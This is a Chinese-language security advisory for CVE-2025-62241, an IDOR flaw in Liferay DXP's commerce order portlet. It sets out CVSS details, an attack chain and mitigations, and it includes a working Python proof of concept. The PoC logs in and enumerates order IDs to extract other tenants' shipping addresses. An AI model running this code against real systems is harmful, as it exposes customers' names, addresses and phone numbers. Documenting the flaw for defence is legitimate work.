CVE-2025-62241 Liferay DXP 商业订单发货地址IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-62241

漏洞类型

不安全直接对象引用 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay DXP (Digital Experience Platform)

漏洞概述

CVE-2025-62241是Liferay DXP 2023.Q4.1至2023.Q4.5版本中存在的一个不安全直接对象引用（IDOR）漏洞。该漏洞位于商业订单管理模块中，具体涉及_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId参数的处理逻辑。Liferay DXP作为企业级数字体验平台，支持多租户虚拟实例（Virtual Instance）架构，允许不同业务单元在同一物理部署中独立运行。然而，由于该模块在处理订单请求时未对用户所属虚拟实例进行充分的权限校验，导致经过身份验证的低权限用户可以通过篡改commerceOrderId参数，从一个虚拟实例越权访问另一个虚拟实例的发货地址信息。此类IDOR漏洞属于访问控制缺陷，攻击者无需特殊权限提升，仅需合法凭证即可跨租户获取敏感数据。该漏洞的CVSS 3.1评分为4.3分，属于中危级别，主要影响数据的机密性，对系统完整性和可用性无直接影响。受影响用户应及时升级至修复版本以消除风险。

技术细节

该漏洞的核心原理在于CommerceOrderPortlet在处理订单发货地址查询请求时，未对请求中携带的commerceOrderId参数进行严格的归属校验。在Liferay DXP的多租户架构中，每个虚拟实例（Instance）拥有独立的订单、用户和地址数据空间，正常的访问控制应当确保用户只能访问所属实例的订单数据。然而，受影响版本的实现中，Portlet仅验证了用户是否已登录及是否具有基础访问权限，而未将订单ID与用户所属虚拟实例进行绑定验证。攻击者利用方式如下：首先，攻击者需要拥有任意虚拟实例的有效认证凭证（低权限账户即可）；然后，通过构造包含目标虚拟实例订单ID的请求，访问CommerceOrderPortlet相关接口；由于缺少跨实例校验，服务端直接返回目标订单关联的发货地址信息，包括收件人姓名、地址、电话等敏感数据。该漏洞利用条件简单，无需用户交互，仅需网络访问权限和有效凭证，属于典型的水平越权（Horizontal Privilege Escalation）场景。从CVSS向量分析，攻击复杂度低（AC:L），所需权限为低权限（PR:L），机密性影响为低（C:L），完整性和可用性均不受影响。

攻击链分析

STEP 1

步骤1：获取认证凭证

攻击者首先在Liferay DXP的任意虚拟实例中注册或获取一个低权限用户账号，作为后续攻击的基础凭证。

STEP 2

步骤2：登录目标系统

使用合法凭证通过/c/portal/login接口登录Liferay DXP，建立有效的会话连接，获取会话Cookie。

STEP 3

步骤3：枚举订单ID

通过遍历或猜测commerceOrderId参数值，构造指向其他虚拟实例订单的请求URL。

STEP 4

步骤4：发送恶意请求

向CommerceOrderPortlet接口发送携带篡改后commerceOrderId参数的GET/POST请求，触发IDOR漏洞。

STEP 5

步骤5：提取敏感数据

服务端未进行跨虚拟实例校验，直接返回目标订单的发货地址信息，包括收件人姓名、详细地址、联系电话等敏感数据。

STEP 6

步骤6：数据利用

攻击者收集其他虚拟实例的发货地址信息，可用于社会工程学攻击、钓鱼攻击或转售获利。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62241 PoC - Liferay DXP Commerce Order IDOR
# Exploits missing virtual instance validation in CommerceOrderPortlet

import requests

TARGET_HOST = "https://target-liferay-instance.com"
AUTH_USER = "attacker_user"
AUTH_PASS = "attacker_password"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_HOST}/c/portal/login"
login_payload = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": AUTH_USER,
    "_com_liferay_login_web_portlet_LoginPortlet_password": AUTH_PASS
}
session.post(login_url, data=login_payload)

# Step 2: Exploit IDOR by manipulating commerceOrderId parameter
# The vulnerable parameter allows accessing shipment addresses
# from a different virtual instance
vuln_endpoint = f"{TARGET_HOST}/group/guest/~/control_panel/manage?p_p_id=com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet"

# Enumerate order IDs from other virtual instances
for order_id in range(1, 100):
    params = {
        "p_p_lifecycle": "0",
        "_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId": str(order_id),
        "_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_mvcRenderCommandName": "/commerce_order/view_commerce_order",
    }
    response = session.get(vuln_endpoint, params=params)

    if response.status_code == 200 and "shipment" in response.text.lower():
        print(f"[+] Order ID {order_id} - Shipment address found:")
        # Extract address information from response
        print(response.text)
        break

# Note: Successful exploitation returns shipment addresses
# belonging to a different virtual instance than the attacker's

影响范围

Liferay DXP 2023.Q4.1

Liferay DXP 2023.Q4.2

Liferay DXP 2023.Q4.3

Liferay DXP 2023.Q4.4

Liferay DXP 2023.Q4.5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在反向代理或WAF层面添加规则，监控和拦截异常的commerceOrderId参数访问请求；2）限制CommerceOrderPortlet的访问权限，仅允许管理员角色的用户访问订单管理功能；3）启用详细的访问日志，对跨虚拟实例的订单查询请求进行告警；4）审查现有虚拟实例间的数据隔离配置，确保其他模块不存在类似的IDOR问题；5）监控异常的数据导出或批量查询行为，及时发现潜在的横向越权攻击。